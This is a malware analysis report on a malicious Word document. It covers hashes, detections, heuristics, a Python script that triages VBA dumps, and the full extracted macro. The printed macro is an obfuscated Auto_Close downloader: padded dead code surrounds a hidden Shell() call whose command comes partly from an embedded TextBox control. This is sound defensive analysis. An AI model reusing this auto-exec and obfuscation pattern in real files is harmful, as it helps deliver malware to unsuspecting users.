Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b83c0865858bccbc…

MALICIOUS

Office (OLE)

Size: 105.6 KB
Created: 2018-12-19 16:27:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 79cd8ce55ce24f6145845095e7aa8fa3
SHA-1: d9aa9deb6203c7561c4b2ba14e5e87445761f926
SHA-256: b83c0865858bccbce5c01b0742388e42a0488eb30fcee7721976c5cdfed00d7b
Risk score: 250

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Word (OLE) document carrying VBA macros. The ThisDocument module (b39699628) defines an autoclose() procedure, the Auto_Close trigger that Word runs when the document is closed, so once macros are enabled the payload runs even if the user opens the file and immediately closes it. autoclose() calls A93977(), whose only live statement is an Interaction.Shell() call; the surrounding Select Case / Rnd() / Tan() blocks appear to be dead-code padding (their Select Case subjects are never assigned, so no branch is taken). The command string is concatenated at run time from variables and from the value of the TextBox1 MSForms control embedded in ThisDocument, and the process is started with a hidden window. Because part of the command comes from the form control rather than the macro source, the exact payload and download destination cannot be recovered from the extracted VBA alone; the control's stored value must be pulled from the document's embedded-control storage or observed in dynamic analysis. The ClamAV Doc.Downloader detection and the SC_STR_CMD heuristic (cmd.exe with an execution flag) are consistent with a download-and-execute stage.

Heuristics (8)

  • ClamAV: Doc.Downloader.Generic-6789372-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6789372-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched line in script (with surrounding context):
          End Select
    S67943 = Array(Q494600809, v49713, j476169, Interaction.Shell(CVar("" + S2212509 + s131557 + w38655703 + R626178 + b39699628.TextBox1) + Y7118227 + j38152, 35 - 35), i86854)
       Select Case j903
    The second Shell() argument, 35 - 35, folds to 0 (vbHide), so the spawned process has no visible window. The command string itself includes b39699628.TextBox1, a form control whose value is not present in the VBA source.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro [low] OLE_VBA_AUTOCLOSE
    Matched line in script (with surrounding context):
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoclose()
    A93977
    autoclose() runs when the document is closed; its single statement calls A93977, the function that contains the Shell() call above.
  • Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD
    No matched line is shown for this finding.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. This heuristic's generic description assumes that no modern VBA project was recovered; in this sample one was (see Extracted artifacts), so treat the marker as secondary evidence of the old Word macro execution surface, not as a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body). This is the OOXML DrawingML XML namespace identifier that Office writes into documents, not a host the macro contacts; do not treat it as a network indicator.
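The auto-exec and Shell() heuristics above reduce to a few mechanical checks on the extracted source. The Python below is an added example, not the analyser's code and not part of the sample, that runs those checks over a constructed excerpt of this document's macro: it finds the auto-exec procedure and the routine it calls, locates each Shell() call, folds the window-style argument (so 35 - 35 resolves to 0, vbHide), and reports when the command string is assembled from an embedded MSForms control such as TextBox1, whose value lives outside the VBA source. Module and identifier names are taken from the page; the Select Case padding is left out of the sample.

```python
"""Triage an olevba-style VBA dump: auto-exec entry points, Shell() calls, the window
style each requests, and command strings built from an embedded form control."""
import ast
import re

# Constructed sample: the live lines of the macro extracted from this document
# (module names and identifiers as on the page); the Select Case padding is omitted.
SAMPLE_VBA = '''Attribute VB_Name = "b39699628"
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoclose()
A93977
End Sub

Attribute VB_Name = "r796538400108"
Function A93977()
On Error Resume Next
S67943 = Array(Q494600809, v49713, j476169, Interaction.Shell(CVar("" + S2212509 + s131557 + w38655703 + R626178 + b39699628.TextBox1) + Y7118227 + j38152, 35 - 35), i86854)
End Function
'''

# Procedures Word/Excel run without a click; Auto_Close fires when the file is closed.
AUTOEXEC_NAMES = {"autoopen", "auto_open", "autoclose", "auto_close", "autoexec", "autonew",
                  "autoexit", "document_open", "document_close", "workbook_open", "workbook_close"}
# Shell() windowstyle constants; vbMinimizedFocus (2) is the default when omitted.
WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                 3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}
SUB_RE = re.compile(r'^\s*(?:Public |Private )?Sub (\w+)\s*\(\)\s*\n(.*?)^\s*End Sub', re.S | re.M | re.I)


def split_modules(src):
    """{module_name: body}, splitting the dump on Attribute VB_Name lines."""
    parts = re.split(r'^Attribute VB_Name = "([^"]+)"[^\n]*\n?', src, flags=re.M)
    return dict(zip(parts[1::2], parts[2::2]))


def form_controls(modules):
    """{module: {control name}} declared via Attribute VB_Control lines."""
    return {mod: set(re.findall(r'Attribute VB_Control = "([^",]+)', body))
            for mod, body in modules.items()}


def autoexec_entrypoints(modules):
    """[(module, procedure, first statement)] for every auto-exec Sub."""
    hits = []
    for mod, body in modules.items():
        for m in SUB_RE.finditer(body):
            if m.group(1).lower() in AUTOEXEC_NAMES:
                first = next((ln.strip() for ln in m.group(2).splitlines() if ln.strip()), "")
                hits.append((mod, m.group(1), first))
    return hits


def call_args(text, open_idx):
    """Arguments of the call whose '(' is at text[open_idx], split on top-level commas.
    Commas and parentheses inside VBA string literals (doubled-quote escapes) are ignored."""
    args, cur, depth, in_str = [], [], 0, False
    for ch in text[open_idx + 1:]:
        if ch == '"':
            in_str = not in_str
        elif not in_str and depth == 0 and ch in ",)":
            args.append("".join(cur).strip())
            cur = []
            if ch == ")":
                return args
            continue
        elif not in_str:
            depth += (ch == "(") - (ch == ")")
        cur.append(ch)
    raise ValueError("unbalanced call")


def fold_constant(expr):
    """Fold integer +, -, * arithmetic such as '35 - 35'; None if not constant."""
    ops = {ast.Add: int.__add__, ast.Sub: int.__sub__, ast.Mult: int.__mul__}

    def ev(n):
        if isinstance(n, ast.Constant) and type(n.value) is int:
            return n.value
        if isinstance(n, ast.BinOp) and type(n.op) in ops:
            return ops[type(n.op)](ev(n.left), ev(n.right))
        raise ValueError("not a constant expression")

    try:
        return ev(ast.parse(expr.strip(), mode="eval").body)
    except (SyntaxError, ValueError):
        return None


def shell_calls(modules):
    """One record per Shell()/Interaction.Shell() call: command expression, resolved
    window style, and the embedded controls the command string depends on."""
    controls = form_controls(modules)
    findings = []
    for mod, body in modules.items():
        for m in re.finditer(r'\b(?:Interaction\.)?Shell\s*\(', body):
            args = call_args(body, m.end() - 1)
            style = fold_constant(args[1]) if len(args) > 1 else 2
            refs = [(o, c) for o, cs in controls.items() for c in cs
                    if re.search(rf'\b{re.escape(o)}\.{re.escape(c)}\b', args[0])]
            findings.append({"module": mod, "command_expr": args[0],
                             "window_style": WINDOW_STYLES.get(style, style), "control_refs": refs})
    return findings


def triage(src):
    """Which auto-exec procedure runs, and what each Shell() call does."""
    modules = split_modules(src)
    return {"autoexec": autoexec_entrypoints(modules), "shell": shell_calls(modules)}
```

To run it on real olevba output, read the dump into a string and pass it to triage() in place of SAMPLE_VBA. The control reference is the output that matters for this sample: when the Shell command depends on b39699628.TextBox1, the downloader command line has to be recovered from the embedded control's stored value or from dynamic analysis, not from macros.bas, and a detection that only greps the VBA text for a URL will come up empty.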

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3857 bytes
SHA-256: a6bc010fbbfc41d20260c0c0f3ca65b3f48ce99b9b46c08537bf4c2344d4ee23
Preview of the extracted script (first 1,000 lines)
Attribute VB_Name = "b39699628"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoclose()
A93977
End Sub

Attribute VB_Name = "r796538400108"
Function A93977()
On Error Resume Next
   Select Case l4106
         Case 182722759
 E100 = J6497
b015 = Rnd(w4278 - Round(k431) / 332908678 - Round(Z0979))
E3035 = V989
z0739 = Rnd(c406 * Tan(239407366))
         Case 126165365
j6379 = n8710
c801 = v798
      End Select
   Select Case R9856
         Case 274218981
 s095 = R231
v0577 = Rnd(R957 - Round(J5881) / 69701613 - Round(l8846))
H5293 = z5454
t9875 = Rnd(F2276 * Tan(17333469))
         Case 229287622
G464 = c485
C570 = W9059
      End Select
S67943 = Array(Q494600809, v49713, j476169, Interaction.Shell(CVar("" + S2212509 + s131557 + w38655703 + R626178 + b39699628.TextBox1) + Y7118227 + j38152, 35 - 35), i86854)
   Select Case j903
         Case 134579612
 i396 = k059
N998 = Rnd(c9216 - Round(I1229) / 260039581 - Round(v2683))
Y294 = p480
z9544 = Rnd(w929 * Tan(114411349))
         Case 167667808
n520 = d776
T3875 = P3224
      End Select
   Select Case z698
         Case 271356251
 f127 = C9037
O364 = Rnd(w5059 - Round(i949) / 295338709 - Round(j4956))
A2447 = d0550
r8847 = Rnd(r446 * Tan(149331870))
         Case 85010848
J233 = n7866
O690 = v6308
      End Select
   Select Case O783
         Case 324183500
 W231 = m392
z201 = Rnd(G0677 - Round(u8765) / 88034141 - Round(u3311))
P491 = k245
G858 = Rnd(I7373 * Tan(143913007))
         Case 179092980
i675 = w0101
o630 = w655
      End Select
   Select Case w7932
         Case 215674546
 n6956 = Z3897
T331 = Rnd(z963 - Round(C3177) / 198778011 - Round(K3065))
A471 = B357
b2587 = Rnd(N3171 * Tan(186124069))
         Case 225347770
r107 = i8090
o604 = A3475
      End Select
End Function


Attribute VB_Name = "W5827652012"

Attribute VB_Name = "s32425311"

Attribute VB_Name = "a2972487186"

Attribute VB_Name = "X0023386565019"

Attribute VB_Name = "E549476790736"

Attribute VB_Name = "S7403528890"

Attribute VB_Name = "i2579042858"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "M375162137"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "P07614713292770"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w92920624"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T4566761767"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False